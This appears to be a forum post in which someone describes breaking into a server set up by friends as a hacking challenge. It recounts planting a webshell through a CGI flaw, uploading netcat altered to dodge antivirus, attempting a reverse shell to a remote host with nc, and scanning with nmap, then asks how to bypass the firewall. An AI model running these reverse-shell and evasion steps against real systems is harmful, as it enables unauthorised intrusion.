some friends of mine opened a *h*a*c*k*i*n* challenge
"the quest is to get a file in c:\game"
i created a webshell by using a cgi vulnerability in the forum that they set up on the server.
then i get in there, uploaded netcat [i modified it a little bit so those antivirus programs won't detect it.]
i bind a port on my remote server
nc -l -p 234
then use webshell to make a reverse connection to the server
nc -e cmd.exe REMOTE_IP 234
it doesn't work out, no incoming connection shows on my remote server
i tried to dir c:\, it shows that c: is restricted to iusr_computername
then i uploaded reg.exe from 2000 resource kit tool and psinfo in order to get more information
it clearly shows that service pack is up-to-date
the things begin to make me dizzy
i go back to my remote server
nmap -sS -P0 HOST_IP
a couple of ports were listed and only 80 www is open for using, the rest are all in filtered mode ;(
i was wondering, is there any way to disable the firewall or just simply grab a list from the c:\game
then pick the file that we are looking for?
ps: after i use net start, only regular services show up. no sign of norton
well i am sure there's gotta be some firewall program or the default TCP/IP filtering was modified [permit 80 TCP only]